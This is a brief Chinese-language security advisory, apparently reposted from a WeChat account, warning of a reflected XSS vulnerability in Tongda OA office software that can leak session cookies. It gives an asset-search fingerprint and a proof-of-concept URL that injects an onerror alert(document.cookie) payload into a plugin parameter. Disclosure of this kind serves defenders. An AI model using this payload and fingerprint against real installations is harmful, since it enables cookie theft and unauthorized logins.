通达OA是中国协同办公自动化软件(OA软件)普及型的旗舰产品。该系统存在xss跨站脚本漏洞,可能造成cookie泄漏,黑客可利用获得的cookie登录系统。
指纹:
app
=
"TDXK-通达OA"
poc:
http:
/
/ip/module
/html_editor/editor
/plugins/td
_listview/td_listview.php?GZIP_POSTFIX=%
22
+onerror=alert(document.cookie)+a=
1
原文始发于微信公众号(丁永博的成长日记):关于通达OA存在反射XSS漏洞的预警
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论